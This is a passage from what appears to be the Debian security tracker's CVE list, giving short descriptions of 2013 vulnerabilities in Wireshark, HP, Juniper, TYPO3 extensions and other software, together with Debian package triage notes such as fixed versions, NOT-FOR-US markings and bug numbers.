Not suitable for code injection CVE-2013-4927 (Integer signedness error in the get_type_length function in epan/disse ...) {DLA-497-1} - wireshark 1.10.1-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-4926 (epan/dissectors/packet-dcom-sysact.c in the DCOM ISystemActivator diss ...) - wireshark 1.10.1-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) CVE-2013-4925 (Integer signedness error in epan/dissectors/packet-dcom-sysact.c in th ...) - wireshark 1.10.1-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) CVE-2013-4924 (epan/dissectors/packet-dcom-sysact.c in the DCOM ISystemActivator diss ...) - wireshark 1.10.1-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) CVE-2013-4923 (Memory leak in the dissect_dcom_ActivationProperties function in epan/ ...) - wireshark 1.10.1-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) CVE-2013-4922 (Double free vulnerability in the dissect_dcom_ActivationProperties fun ...) - wireshark 1.10.1-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) CVE-2013-4921 (Off-by-one error in the dissect_radiotap function in epan/dissectors/p ...) - wireshark 1.10.1-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) CVE-2013-4920 (The P1 dissector in Wireshark 1.10.x before 1.10.1 does not properly i ...) - wireshark 1.10.1-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) CVE-2013-4919 RESERVED CVE-2013-4918 RESERVED CVE-2013-4917 RESERVED CVE-2013-4916 RESERVED CVE-2013-4915 RESERVED CVE-2013-4914 RESERVED CVE-2013-4913 RESERVED CVE-2013-4912 (Open redirect vulnerability in Siemens WinCC (TIA Portal) 11 and 12 be ...) NOT-FOR-US: Siemens CVE-2013-4911 (Cross-site request forgery (CSRF) vulnerability in Siemens WinCC (TIA ...) NOT-FOR-US: Siemens CVE-2013-4910 RESERVED CVE-2013-4909 RESERVED CVE-2013-4908 RESERVED CVE-2013-4907 RESERVED CVE-2013-4906 RESERVED CVE-2013-4905 RESERVED CVE-2013-4904 RESERVED CVE-2013-4903 RESERVED CVE-2013-4902 RESERVED CVE-2013-4901 RESERVED CVE-2013-4900 (Directory traversal vulnerability in DeWeS web server 0.4.2 and possib ...) NOT-FOR-US: DeWeS web server (Twilight CMS) CVE-2013-4899 (Cross-site scripting (XSS) vulnerability in Twilight CMS 5.17 and poss ...) NOT-FOR-US: Twilight CMS CVE-2013-4898 (Unrestricted file upload vulnerability in the user profile page featur ...) NOT-FOR-US: Timeline Plugin for SocialEngine CVE-2013-4897 REJECTED CVE-2013-4896 RESERVED CVE-2013-4895 RESERVED CVE-2013-4894 RESERVED CVE-2013-4893 RESERVED CVE-2013-4892 RESERVED CVE-2013-4891 (The xss_clean function in CodeIgniter before 2.1.4 might allow remote ...) - codeigniter (bug #471583) CVE-2013-4889 (Multiple cross-site request forgery (CSRF) vulnerabilities in index.ph ...) NOT-FOR-US: Digital Signage Xibo CVE-2013-4888 (Cross-site scripting (XSS) vulnerability in index.php in Digital Signa ...) NOT-FOR-US: Digital Signage Xibo CVE-2013-4887 (SQL injection vulnerability in index.php in Digital Signage Xibo 1.4.2 ...) NOT-FOR-US: Digital Signage Xibo CVE-2013-4886 RESERVED CVE-2013-4885 (The http-domino-enum-passwords.nse script in NMap before 6.40, when do ...) - nmap 6.40-0.1 (low; bug #719289) [squeeze] - nmap (Vulnerable code not present) [wheezy] - nmap 6.00-0.3+deb7u1 CVE-2013-4884 (Cross-site scripting (XSS) vulnerability in McAfee SuperScan 4.0 allow ...) NOT-FOR-US: McAfee SuperScan CVE-2013-5217 REJECTED CVE-2013-4890 (The DMCRUIS/0.1 web server on the Samsung PS50C7700 TV allows remote a ...) NOT-FOR-US: Samsung TV CVE-2013-4883 (Multiple cross-site scripting (XSS) vulnerabilities in McAfee ePolicy ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2013-4882 (Multiple SQL injection vulnerabilities in McAfee ePolicy Orchestrator ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2013-4881 (Cross-site request forgery (CSRF) vulnerability in core/admin/modules/ ...) NOT-FOR-US: BigTree CMS CVE-2013-4880 (Cross-site scripting (XSS) vulnerability in core/admin/modules/develop ...) NOT-FOR-US: BigTree CMS CVE-2013-4879 (SQL injection vulnerability in core/inc/bigtree/cms.php in BigTree CMS ...) NOT-FOR-US: BigTree CMS CVE-2013-4878 (The default configuration of Parallels Plesk Panel 9.0.x and 9.2.x on ...) NOT-FOR-US: Parallels Plesk Panel CVE-2013-4877 (The Verizon Wireless Network Extender SCS-26UC4 and SCS-2U01 does not ...) NOT-FOR-US: Verizon Wireless Network Extender CVE-2013-4876 (The Verizon Wireless Network Extender SCS-2U01 has a hardcoded passwor ...) NOT-FOR-US: Verizon Wireless Network Extender CVE-2013-4875 (The Uboot bootloader on the Verizon Wireless Network Extender SCS-2U01 ...) NOT-FOR-US: Verizon Wireless Network Extender SCS-2U01 CVE-2013-4874 (The Uboot bootloader on the Verizon Wireless Network Extender SCS-26UC ...) NOT-FOR-US: Verizon Wireless Network Extender CVE-2013-4873 (The Yahoo! Tumblr app before 3.4.1 for iOS sends cleartext credentials ...) NOT-FOR-US: iOS app CVE-2013-4872 (Google Glass before XE6 does not properly restrict the processing of Q ...) NOT-FOR-US: Google Glass CVE-2013-4871 (Cross-site request forgery (CSRF) vulnerability in the TEQneers SEO En ...) NOT-FOR-US: TYPO3 extension tq_seo CVE-2013-4870 (SQL injection vulnerability in the News Search (news_search) extension ...) NOT-FOR-US: TYPO3 extension news_search CVE-2013-4869 (Cisco Unified Communications Manager (CUCM) 7.1(x) through 9.1(2) and ...) NOT-FOR-US: Cisco CVE-2013-4868 (Karotz API 12.07.19.00: Session Token Information Disclosure ...) NOT-FOR-US: Karotz API CVE-2013-4867 (Electronic Arts Karotz Smart Rabbit 12.07.19.00 allows Python module h ...) NOT-FOR-US: Electronic Arts Karotz Smart Rabbit CVE-2013-4866 (The LIXIL Corporation My SATIS Genius Toilet application for Android h ...) NOT-FOR-US: LIXIL Corporation My SATIS Genius Toilet application for Android CVE-2013-4865 (Cross-site request forgery (CSRF) vulnerability in upgrade_step2.sh in ...) NOT-FOR-US: MiCasaVerde VeraLite CVE-2013-4864 (MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to ...) NOT-FOR-US: MiCasaVerde VeraLite CVE-2013-4863 (The HomeAutomationGateway service in MiCasaVerde VeraLite with firmwar ...) NOT-FOR-US: MiCasaVerde VeraLite CVE-2013-4862 (MiCasaVerde VeraLite with firmware 1.5.408 does not properly restrict ...) NOT-FOR-US: MiCasaVerde VeraLite CVE-2013-4861 (Directory traversal vulnerability in cgi-bin/cmh/get_file.sh in MiCasa ...) NOT-FOR-US: MiCasaVerde VeraLite CVE-2013-4860 (Radio Thermostat CT80 And CT50 with firmware 1.4.64 and earlier does n ...) NOT-FOR-US: Radio Thermostat CVE-2013-4859 (INSTEON Hub 2242-222 lacks Web and API authentication ...) NOT-FOR-US: INSTEON Hub CVE-2013-4858 (Microsoft Windows Movie Maker 2.1.4026.0 on Windows XP SP3 allows remo ...) NOT-FOR-US: Microsoft Windows Movie Maker CVE-2013-4857 (D-Link DIR-865L has PHP File Inclusion in the router xml file. ...) NOT-FOR-US: D-Link CVE-2013-4856 (D-Link DIR-865L has Information Disclosure. ...) NOT-FOR-US: D-Link CVE-2013-4855 (D-Link DIR-865L has SMB Symlink Traversal due to misconfiguration in t ...) NOT-FOR-US: D-Link CVE-2013-4854 (The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x bef ...) {DSA-2728-1} - bind9 1:9.8.4.dfsg.P1-6+nmu3 (bug #717936) NOTE: https://kb.isc.org/article/AA-01015/0 CVE-2013-4853 RESERVED CVE-2013-4852 (Integer overflow in PuTTY 0.62 and earlier, WinSCP before 5.1.6, and o ...) {DSA-2736-1} - putty 0.63-1 (bug #718779) - filezilla 3.7.3-1 (low; bug #718800) [squeeze] - filezilla (Minor issue) [wheezy] - filezilla (Minor issue) NOTE: http://www.securityfocus.com/archive/1/527763/30/0 NOTE: http://svn.tartarus.org/sgt?view=revision&sortby=date&revision=9896 CVE-2013-4851 (The vfs_hang_addrlist function in sys/kern/vfs_export.c in the NFS ser ...) {DSA-2743-1} - kfreebsd-9 9.1-4 (bug #717958) - kfreebsd-8 8.3-7 (bug #717959) [wheezy] - kfreebsd-8 8.3-6+deb7u1 [squeeze] - kfreebsd-8 (FreeBSD NFS server implementation was not supported in squeeze) CVE-2013-4850 RESERVED CVE-2013-4849 RESERVED CVE-2013-4848 (TP-Link TL-WDR4300 version 3.13.31 has multiple CSRF vulnerabilities. ...) NOT-FOR-US: TP-Link CVE-2013-4847 RESERVED CVE-2013-4846 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...) NOT-FOR-US: HP System Management Homepage CVE-2013-4845 (Cross-site scripting (XSS) vulnerability on HP Officejet Pro 8500 (aka ...) NOT-FOR-US: HP Officejet Pro CVE-2013-4844 (Unspecified vulnerability in HP Service Manager 7.11, 9.21, 9.30, 9.31 ...) NOT-FOR-US: HP Service Manager and ServiceCenter CVE-2013-4843 (Unspecified vulnerability in HP Integrated Lights-Out 4 (iLO4) with fi ...) NOT-FOR-US: HP iLO CVE-2013-4842 (Cross-site scripting (XSS) vulnerability in HP Integrated Lights-Out 4 ...) NOT-FOR-US: HP iLO CVE-2013-4841 (Unspecified vulnerability in dbd_manager in LeftHand OS before 11.0 in ...) NOT-FOR-US: HP StoreVirtual CVE-2013-4840 (Unspecified vulnerability in HP and H3C VPN Firewall Module products S ...) NOT-FOR-US: HP and H3C VPN Firewall Module CVE-2013-4839 (Unspecified vulnerability in Virtual User Generator in HP LoadRunner b ...) NOT-FOR-US: HP LoadRunner CVE-2013-4838 (Unspecified vulnerability in Virtual User Generator in HP LoadRunner b ...) NOT-FOR-US: HP LoadRunner CVE-2013-4837 (Unspecified vulnerability in Virtual User Generator in HP LoadRunner b ...) NOT-FOR-US: HP LoadRunner CVE-2013-4836 (Unspecified vulnerability in the GossipService SOAP Request implementa ...) NOT-FOR-US: HP Application LifeCycle Management CVE-2013-4835 (The APISiteScopeImpl SOAP service in HP SiteScope 10.1x and 11.x befor ...) NOT-FOR-US: HP SiteScope CVE-2013-4834 (Unspecified vulnerability in the client component in HP Application Li ...) NOT-FOR-US: HP Application LifeCycle Management CVE-2013-4833 (Cross-site scripting (XSS) vulnerability in HP Service Manager 9.30 th ...) NOT-FOR-US: HP CVE-2013-4832 (HP Service Manager 9.30 through 9.32 allows remote authenticated users ...) NOT-FOR-US: HP CVE-2013-4831 (HP Service Manager 9.30 through 9.32 does not properly manage privileg ...) NOT-FOR-US: HP CVE-2013-4830 (HP Service Manager 9.30 through 9.32 allows remote attackers to execut ...) NOT-FOR-US: HP CVE-2013-4829 (HP LaserJet M4555, M525, and M725; LaserJet flow MFP M525c; LaserJet E ...) NOT-FOR-US: HP CVE-2013-4828 (HP LaserJet M4555, M525, and M725; LaserJet flow MFP M525c; LaserJet E ...) NOT-FOR-US: HP CVE-2013-4827 (SQL injection vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2013-4826 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...) NOT-FOR-US: HP Intelligent Management Center CVE-2013-4825 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...) NOT-FOR-US: HP Intelligent Management Center CVE-2013-4824 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...) NOT-FOR-US: HP Intelligent Management Center CVE-2013-4823 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...) NOT-FOR-US: HP Intelligent Management Center CVE-2013-4822 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...) NOT-FOR-US: HP Intelligent Management Center CVE-2013-4821 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...) NOT-FOR-US: HP System Management Homepage CVE-2013-4820 (Unspecified vulnerability in HP IceWall SSO 8.0 through 10.0, IceWall ...) NOT-FOR-US: HP CVE-2013-4819 (Unspecified vulnerability in HP IceWall SSO Agent Option 8.0 through 1 ...) NOT-FOR-US: HP CVE-2013-4818 (Unspecified vulnerability in HP IceWall SSO 8.0 through 10.0, IceWall ...) NOT-FOR-US: HP CVE-2013-4817 (Unspecified vulnerability in HP IceWall SSO Agent Option 8.0 through 1 ...) NOT-FOR-US: HP CVE-2013-4816 REJECTED CVE-2013-4815 (Cross-site scripting (XSS) vulnerability in the web interface in HP Ar ...) NOT-FOR-US: HP CVE-2013-4814 (Cross-site scripting (XSS) vulnerability in HP XP P9000 Command View A ...) NOT-FOR-US: HP CVE-2013-4813 (The Agent (aka AgentController) servlet in HP ProCurve Manager (PCM) 3 ...) NOT-FOR-US: HP CVE-2013-4812 (UpdateCertificatesServlet in the SNAC registration server in HP ProCur ...) NOT-FOR-US: HP CVE-2013-4811 (UpdateDomainControllerServlet in the SNAC registration server in HP Pr ...) NOT-FOR-US: HP CVE-2013-4810 (HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Dr ...) NOT-FOR-US: HP CVE-2013-4809 (Multiple SQL injection vulnerabilities in GetEventsServlet in HP ProCu ...) NOT-FOR-US: HP CVE-2013-4808 (Unspecified vulnerability in HP Service Manager 7.11, 9.21, 9.30, and ...) NOT-FOR-US: HP CVE-2013-4807 (Unspecified vulnerability on the HP LaserJet Pro P1102w, P1606dn, M121 ...) NOT-FOR-US: HP CVE-2013-4806 (The OSPF implementation on HP JD9##A routers; HP J4###A, J484#B, J8### ...) NOT-FOR-US: HP routers CVE-2013-4805 (Unspecified vulnerability in HP Integrated Lights-Out 3 (aka iLO3) fir ...) NOT-FOR-US: HP Integrated Lights-Out firmware CVE-2013-4804 (Unspecified vulnerability in HP Business Process Monitor 9.13.1 patch ...) NOT-FOR-US: HP Business Process Monitor CVE-2013-4803 REJECTED CVE-2013-4802 (Cross-site scripting (XSS) vulnerability in HP Application Lifecycle M ...) NOT-FOR-US: HP CVE-2013-4801 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...) NOT-FOR-US: HP LoadRunner CVE-2013-4800 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...) NOT-FOR-US: HP LoadRunner CVE-2013-4799 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...) NOT-FOR-US: HP LoadRunner CVE-2013-4798 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...) NOT-FOR-US: HP LoadRunner CVE-2013-4797 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...) NOT-FOR-US: HP LoadRunner CVE-2013-4796 (ReviewBoard 1.6.17 allows code execution by attaching PHP scripts to r ...) - reviewboard (bug #653113) CVE-2013-4795 (Cross-site scripting (XSS) vulnerability in the Submitters list in Rev ...) - reviewboard (bug #653113) CVE-2013-4794 RESERVED CVE-2013-4793 (The update function in umbraco.webservices/templates/templateService.c ...) NOT-FOR-US: Umbraco CVE-2013-4792 (PrestaShop before 1.4.11 allows logout CSRF. ...) NOT-FOR-US: PrestaShop CVE-2013-4791 (PrestaShop before 1.4.11 allows Logistician, translators and other low ...) NOT-FOR-US: PrestaShop CVE-2013-4790 (Open-Xchange AppSuite before 7.0.2 rev14, 7.2.0 before rev11, 7.2.1 be ...) NOT-FOR-US: Open-Xchange CVE-2013-4789 (SQL injection vulnerability in modules/rss/rss.php in Cotonti before 0 ...) NOT-FOR-US: Cotonti CVE-2013-4788 (The PTR_MANGLE implementation in the GNU C Library (aka glibc or libc6 ...) {DLA-165-1} - glibc 2.17-94 (low; bug #717178) - eglibc [wheezy] - eglibc 2.13-38+deb7u1 CVE-2013-4787 (Android 1.6 Donut through 4.2 Jelly Bean does not properly check crypt ...) NOT-FOR-US: Android CVE-2013-4786 (The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange P ...) NOTE: Design flaw in the IPMI 2.0 specification. Any correctly implemented device is vulnerable. NOTE: Contacted relevant maintainers: Since few to no devices do mutual authentication, tools shipped by Debian are generally not affected. At best, the tools can print a warning for vulnerable devices. CVE-2013-4784 (The HP Integrated Lights-Out (iLO) BMC implementation allows remote at ...) NOT-FOR-US: HP IPMI device CVE-2013-4781 (core/getLog.php on the Siemens Enterprise OpenScape Branch appliance a ...) NOT-FOR-US: Siemens Enterprise OpenScape CVE-2013-4780 (core/getLog.php on the Siemens Enterprise OpenScape Branch appliance a ...) NOT-FOR-US: Siemens Enterprise OpenScape CVE-2013-4779 (Cross-site scripting (XSS) vulnerability in core/handleTw.php on the S ...) NOT-FOR-US: Siemens Enterprise OpenScape CVE-2013-4778 (core/getLog.php on the Siemens Enterprise OpenScape Branch appliance a ...) NOT-FOR-US: Siemens Enterprise OpenScape CVE-2013-4777 (A certain configuration of Android 2.3.7 on the Motorola Defy XT phone ...) NOT-FOR-US: Motorola CVE-2013-4776 (NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earli ...) NOT-FOR-US: NETGEAR CVE-2013-4775 (NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earli ...) NOT-FOR-US: NETGEAR CVE-2013-4785 (The web interface on the Dell iDRAC6 with firmware before 1.95 allows ...) NOT-FOR-US: Dell CVE-2013-4783 (The Dell iDRAC6 with firmware 1.x before 1.92 and 2.x and 3.x before 3 ...) NOT-FOR-US: Dell CVE-2013-4782 (The Supermicro BMC implementation allows remote attackers to bypass au ...) NOT-FOR-US: Supermicro CVE-2013-4774 RESERVED CVE-2013-4773 RESERVED CVE-2013-4772 (D-Link DIR-505L SharePort Mobile Companion 1.01 and DIR-826L Wireless ...) NOT-FOR-US: D-Link CVE-2013-4771 RESERVED CVE-2013-4770 (Cross-site scripting (XSS) vulnerability in Eucalyptus Management Cons ...) NOT-FOR-US: Eucalyptus Management Console CVE-2013-4769 (The cloud controller (aka CLC) component in Eucalyptus 3.3.x and 3.4.x ...) - eucalyptus CVE-2013-4768 (The web services APIs in Eucalyptus 2.0 through 3.4.1 allow remote att ...) - eucalyptus CVE-2013-4767 (Unspecified vulnerability in Eucalyptus before 3.3.2 has unknown impac ...) - eucalyptus CVE-2013-4766 (The gather log service in Eucalyptus before 3.3.1 allows remote attack ...) - eucalyptus CVE-2013-4765 RESERVED CVE-2013-4764 (Samsung Galaxy S3/S4 exposes an unprotected component allowing an unpr ...) NOT-FOR-US: Samsung CVE-2013-4763 (Samsung Galaxy S3/S4 exposes an unprotected component allowing arbitra ...) NOT-FOR-US: Samsung CVE-2013-4762 (Puppet Enterprise before 3.0.1 does not sufficiently invalidate a sess ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4761 (Unspecified vulnerability in Puppet 2.7.x before 2.7.23 and 3.2.x befo ...) {DSA-2761-1} - puppet 3.2.4-1 (low) [squeeze] - puppet (non-standard config and attacker requires local access to master) CVE-2013-4760 RESERVED CVE-2013-4759 (Multiple cross-site scripting (XSS) vulnerabilities in the Magnolia Fo ...) NOT-FOR-US: Magnolia CMS CVE-2013-4757 RESERVED CVE-2013-4756 RESERVED CVE-2013-4758 (Double free vulnerability in the writeDataError function in the Elasti ...) - rsyslog (omelasticsearch plugin not enabled; see #715009) [squeeze] - rsyslog (omelasticsearch plugin not yet present) [wheezy] - rsyslog (omelasticsearch plugin not yet present) NOTE: http://bugzilla.adiscon.com/show_bug.cgi?id=461 NOTE: http://git.adiscon.com/?p=rsyslog.git;a=commitdiff;h=80f88242982c9c6ad6ce8628fc5b94ea74051cf4 CVE-2013-4755 RESERVED CVE-2013-4754 (Multiple cross-site scripting (XSS) vulnerabilities in Owl Intranet Kn ...) NOT-FOR-US: Owl Intranet Knowledgebase CVE-2013-4753 (Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.11. ...) NOT-FOR-US: Claroline CVE-2013-4752 (Symfony 2.0.X before 2.0.24, 2.1.X before 2.1.12, 2.2.X before 2.2.5, ...) NOT-FOR-US: Symfony HttpFoundation component CVE-2013-4751 (php-symfony2-Validator has loss of information during serialization ...) NOT-FOR-US: Symfony Validator component CVE-2013-4750 RESERVED CVE-2013-4749 (Cross-site scripting (XSS) vulnerability in the UserTask Center, Messa ...) NOT-FOR-US: sys_messages TYPO3 extension CVE-2013-4748 (SQL injection vulnerability in the News system (news) extension before ...) NOT-FOR-US: News system TYPO3 extension CVE-2013-4747 (Cross-site scripting (XSS) vulnerability in the Accessible browse resu ...) NOT-FOR-US: Accessible browse results TYPO3 extension CVE-2013-4746 (Cross-site scripting (XSS) vulnerability in the My quiz and poll (myqu ...) NOT-FOR-US: My quiz and poll TYPO3 extension CVE-2013-4745 (SQL injection vulnerability in the My quiz and poll (myquizpoll) exten ...) NOT-FOR-US: My quiz and poll TYPO3 extension CVE-2013-4744 (Cross-site scripting (XSS) vulnerability in the PHPUnit extension befo ...) NOT-FOR-US: PHPUnit TYPO3 extension CVE-2013-4743 (Static HTTP Server 1.0 has a Local Overflow ...) NOT-FOR-US: Static HTTP Server CVE-2013-4742 (Buffer overflow in NetWin SurgeFTP before 23d2 allows remote attackers ...) NOT-FOR-US: SurgeFTP CVE-2013-4741 RESERVED CVE-2013-4740 (goodix_tool.c in the Goodix gt915 touchscreen driver for the Linux ker ...) NOT-FOR-US: Goodix gt915 Android touchscreen driver CVE-2013-4739 (The MSM camera driver for the Linux kernel 3.x, as used in Qualcomm In ...) - linux (Android-specific camera drivers) CVE-2013-4738 (Multiple stack-based buffer overflows in the MSM camera driver for the ...) - linux (Android-specific camera drivers) CVE-2013-4737 (The CONFIG_STRICT_MEMORY_RWX implementation for the Linux kernel 3.x, ...) - linux (Affected code not in mainline kernel) - linux-2.6 (Affected code not in mainline kernel) NOTE: https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=4256415b296348ff16cd17a5b8f8dce4dea37328 CVE-2013-4736 (Multiple integer overflows in the JPEG engine drivers in the MSM camer ...) NOTE: https://www.codeaurora.org/projects/security-advisories/integer-overflow-and-signedness-issue-camera-jpeg-engines-cve-2013-4736 NOT-FOR-US: camera JPEG engines on Android Linux kernels CVE-2013-4735 (The Digital Alert Systems DASDEC EAS device before 2.0-2 and the Monro ...) NOT-FOR-US: Digital Alert Systems and Monroe Electronics CVE-2013-4734 (dasdec_mkuser on the Digital Alert Systems DASDEC EAS device before 2. ...) NOT-FOR-US: Alert Systems and Monroe Electronics CVE-2013-4733 (The web server on the Digital Alert Systems DASDEC EAS device before 2 ...) NOT-FOR-US: Alert Systems and Monroe Electronics CVE-2013-4732 (** DISPUTED ** The administrative web server on the Digital Alert Syst ...) NOT-FOR-US: Alert Systems and Monroe Electronics CVE-2013-4731 (ajax.cgi in the web interface on the Choice Wireless Green Packet WIXF ...) NOT-FOR-US: Choice Wireless Green Packet modem CVE-2013-4730 (Buffer overflow in PCMan's FTP Server 2.0.7 allows remote attackers to ...) NOT-FOR-US: PCMan FTP Server CVE-2013-4729 (import.php in phpMyAdmin 4.x before 4.0.4.1 does not properly restrict ...) - phpmyadmin 4:4.0.4.1-1 [wheezy] - phpmyadmin (vulnerable code not present) [squeeze] - phpmyadmin (vulnerable code not present) CVE-2013-4728 (DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b ...) NOT-FOR-US: Acora CMS CVE-2013-4727 (DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b ...) NOT-FOR-US: Acora CMS CVE-2013-4726 (Cross-site request forgery (CSRF) vulnerability in DDSN Interactive cm ...) NOT-FOR-US: Acora CMS CVE-2013-4725 (DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b ...) NOT-FOR-US: Acora CMS CVE-2013-4724 (DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b ...) NOT-FOR-US: Acora CMS CVE-2013-4723 (Open redirect vulnerability in DDSN Interactive cm3 Acora CMS 6.0.6/1a ...) NOT-FOR-US: Acora CMS CVE-2013-4722 (Multiple cross-site scripting (XSS) vulnerabilities in Admin/login/def ...) NOT-FOR-US: Acora CMS CVE-2013-4721 (SQL injection vulnerability in the RSS feed from records extension 1.0 ...) NOT-FOR-US: records extension for TYPO3 CVE-2013-4720 (SQL injection vulnerability in the WEC Discussion Forum extension befo ...) NOT-FOR-US: WEC Discussion Forum CVE-2013-4719 (SQL injection vulnerability in the SEO Pack for tt_news extension befo ...) NOT-FOR-US: SEO Pack for tt_news extension for TYPO3 CVE-2013-4718 [XSS] RESERVED NOT-FOR-US: OTRS ITSM CVE-2013-4717 [SQL injection] RESERVED {DSA-2733-1} - otrs2 3.2.9-1 NOTE: http://web.archive.org/web/20131023033811/http://www.otrs.com:80/en/open-source/community-news/security-advisories/security-advisory-2013-05/ CVE-2013-4716 (Cross-site scripting (XSS) vulnerability in Tattyan HP TOWN 5_9_3 and ...) NOT-FOR-US: Tattyan HP TOWN CVE-2013-4715 (SQL injection vulnerability in Tiki Wiki CMS Groupware 6 LTS before 6. ...) - tikiwiki CVE-2013-4714 (Cross-site scripting (XSS) vulnerability in Tiki Wiki CMS Groupware 6 ...) - tikiwiki CVE-2013-4713 (Cross-site scripting (XSS) vulnerability in I-O DATA DEVICE RockDisk w ...) NOT-FOR-US: I-O DATA DEVICE RockDisk CVE-2013-4712 (I-O DATA DEVICE HDL-A and HDL2-A devices with firmware 1.07 and earlie ...) NOT-FOR-US: I-O DATA DEVICE HDL-A and HDL2-A devices CVE-2013-4711 (Cross-site scripting (XSS) vulnerability in Accela BizSearch 3.2 on Li ...) NOT-FOR-US: Accela Bizsearch CVE-2013-4710 (Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, ...) NOT-FOR-US: Android CVE-2013-4709 (Buffer overflow in the PPP Access Concentrator (PPPAC) on the SEIL/x86 ...) NOT-FOR-US: PPP Access Concentrator CVE-2013-4708 (The PPP Access Concentrator (PPPAC) in Internet Initiative Japan Inc. ...) NOT-FOR-US: Internet Initiative Japan Inc CVE-2013-4707 (The SSH implementation on D-Link Japan DES-3810 devices with firmware ...) NOT-FOR-US: D-Link CVE-2013-4706 (The SSH implementation on the D-Link Japan DWL-2100AP with firmware be ...) NOT-FOR-US: D-Link CVE-2013-4705 (Cross-site scripting (XSS) vulnerability in Opera before 15.00 allows ...) NOT-FOR-US: Opera CVE-2013-4704 (Cross-site scripting (XSS) vulnerability in ChamaNet ChamaCargo 7.0000 ...) NOT-FOR-US: ChamaNet ChamaCargo CVE-2013-4703 (Cross-site scripting (XSS) vulnerability in the top-page customization ...) NOT-FOR-US: Cybozu Office CVE-2013-4702 (Multiple directory traversal vulnerabilities in the doApiAction functi ...) NOT-FOR-US: EC-CUBE CVE-2013-4701 (Auth/Yadis/XML.php in PHP OpenID Library 2.2.2 and earlier allows remo ...) - php-openid 2.2.2-1.2 (low; bug #721221) [wheezy] - php-openid (Minor issue) [squeeze] - php-openid (Minor issue) CVE-2013-4700 (The Yahoo! Japan Shopping application 1.4 and earlier for Android does ...) NOT-FOR-US: Yahoo shopping app CVE-2013-4699 (The Yahoo! Japan Yafuoku! application 4.3.0 and earlier for iOS and An ...) NOT-FOR-US: Yahoo shopping app CVE-2013-4698 (Cybozu Mailwise 5.0.4 and 5.0.5 allows remote authenticated users to o ...) NOT-FOR-US: Cybozu Mailwise CVE-2013-4697 (Multiple unspecified vulnerabilities in Hitachi JP1/IT Desktop Managem ...) NOT-FOR-US: Hitachi CVE-2013-4695 (Winamp 5.63: Invalid Pointer Dereference leading to Arbitrary Code Exe ...) NOT-FOR-US: Winamp CVE-2013-4694 (Stack-based buffer overflow in gen_jumpex.dll in Winamp before 5.64 Bu ...) NOT-FOR-US: Winamp CVE-2013-4693 (WordPress Xorbin Digital Flash Clock 1.0 has XSS ...) NOT-FOR-US: WordPress Xorbin Digital Flash Clock CVE-2013-4692 (Xorbin Analog Flash Clock 1.0 extension for Joomia has XSS ...) NOT-FOR-US: Xorbin Analog Flash Clock CVE-2013-4691 (Sencha Labs Connect has XSS with connect.methodOverride() ...) NOT-FOR-US: Sencha Labs Connect CVE-2013-4690 (Juniper Junos 10.4 before 10.4S13, 11.4 before 11.4R7-S1, 12.1 before ...) NOT-FOR-US: Juniper Junos CVE-2013-4689 (J-Web in Juniper Junos before 10.4R13, 11.4 before 11.4R7, 12.1R befor ...) NOT-FOR-US: Juniper Junos CVE-2013-4688 (flowd in Juniper Junos 10.4 before 10.4R11 on SRX devices, when the MS ...) NOT-FOR-US: Juniper Junos CVE-2013-4687 (flowd in Juniper Junos 10.4 before 10.4S14, 11.2 and 11.4 before 11.4R ...) NOT-FOR-US: Juniper Junos CVE-2013-4686 (The kernel in Juniper Junos 10.4 before 10.4R14, 11.4 before 11.4R8, 1 ...) NOT-FOR-US: Juniper Junos CVE-2013-4685 (Buffer overflow in flowd in Juniper Junos 10.4 before 10.4S14, 11.4 be ...) NOT-FOR-US: Juniper Junos CVE-2013-4684 (flowd in Juniper Junos 10.4 before 10.4S14, 11.4 before 11.4R8, 12.1 b ...) NOT-FOR-US: Juniper Junos CVE-2013-4683 (SQL injection vulnerability in the meta_feedit extension 0.1.10 and ea ...) NOT-FOR-US: meta_feedit extension for TYPO3 CVE-2013-4682 (SQL injection vulnerability in the Multishop extension before 2.0.39 f ...) NOT-FOR-US: Multishop extension for TYPO3 CVE-2013-4681 (SQL injection 